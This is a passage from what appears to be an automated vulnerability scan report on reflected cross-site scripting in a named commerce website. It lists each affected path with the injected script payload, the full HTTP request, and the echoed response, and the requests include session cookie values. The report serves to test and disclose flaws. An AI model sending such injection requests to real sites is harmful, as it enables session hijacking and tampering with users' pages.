Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/systemf90fb"><script>alert(1)</script>1ea0e7a080/system-menus.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.141. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c53"><script>alert(1)</script>92c043d2bd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system/system-menus.css10c53"><script>alert(1)</script>92c043d2bd7?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/system/system-menus.css10c53"><script>alert(1)</script>92c043d2bd7?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.142. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d9d"><script>alert(1)</script>3ff12a53a87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules82d9d"><script>alert(1)</script>3ff12a53a87/system/system.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules82d9d"><script>alert(1)</script>3ff12a53a87/system/system.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.143. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3fba"><script>alert(1)</script>c22da2ed4f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/systema3fba"><script>alert(1)</script>c22da2ed4f5/system.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/systema3fba"><script>alert(1)</script>c22da2ed4f5/system.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.144. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d7f"><script>alert(1)</script>18ea0726c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system/system.cssf5d7f"><script>alert(1)</script>18ea0726c9d?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/system/system.cssf5d7f"><script>alert(1)</script>18ea0726c9d?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.145. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105cb"><script>alert(1)</script>5dd21cebd5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules105cb"><script>alert(1)</script>5dd21cebd5f/user/user.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules105cb"><script>alert(1)</script>5dd21cebd5f/user/user.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.146. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f76f"><script>alert(1)</script>fb7b171dc58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/user2f76f"><script>alert(1)</script>fb7b171dc58/user.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/user2f76f"><script>alert(1)</script>fb7b171dc58/user.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.147. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a461"><script>alert(1)</script>646e21d0eab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/user/user.css3a461"><script>alert(1)</script>646e21d0eab?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/user/user.css3a461"><script>alert(1)</script>646e21d0eab?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.148. http://www.oscommerce-manager.com/order [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /order

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e42"><script>alert(1)</script>6c47226d429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ordera2e42"><script>alert(1)</script>6c47226d429 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(0x0066)%3C/script%3Ed053e3a864d=1
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.2.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:11:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:11:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/ordera2e42"><script>alert(1)</script>6c47226d429')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.149. http://www.oscommerce-manager.com/order [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /order

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bc1b"><script>alert(1)</script>4491b6523c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order?9bc1b"><script>alert(1)</script>4491b6523c2=1 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(0x0066)%3C/script%3Ed053e3a864d=1
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.2.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:10:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:10:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 29251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/order?9bc1b"><script>alert(1)</script>4491b6523c2=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.150. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /thank-you-purchasing-magneticone-product

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3691d"><script>alert(1)</script>633d138c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /thank-you-purchasing-magneticone-product3691d"><script>alert(1)</script>633d138c7a HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.3.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:11:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:11:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/thank-you-purchasing-magneticone-product3691d"><script>alert(1)</script>633d138c7a')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.151. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /thank-you-purchasing-magneticone-product

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee884"><script>alert(1)</script>9096c38c85d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /thank-you-purchasing-magneticone-product?ee884"><script>alert(1)</script>9096c38c85d=1 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.3.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:10:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:10:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 25283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/thank-you-purchasing-magneticone-product?ee884"><script>alert(1)</script>9096c38c85d=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.152. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3183c"><script>alert(1)</script>20375e6ddd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes3183c"><script>alert(1)</script>20375e6ddd3/oscmanager/images/menu-expanded.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes3183c"><script>alert(1)</script>20375e6ddd3/oscmanager/images/menu-expanded.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.153. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44b2"><script>alert(1)</script>3cf167b5311 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanagerc44b2"><script>alert(1)</script>3cf167b5311/images/menu-expanded.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanagerc44b2"><script>alert(1)</script>3cf167b5311/images/menu-expanded.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.154. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

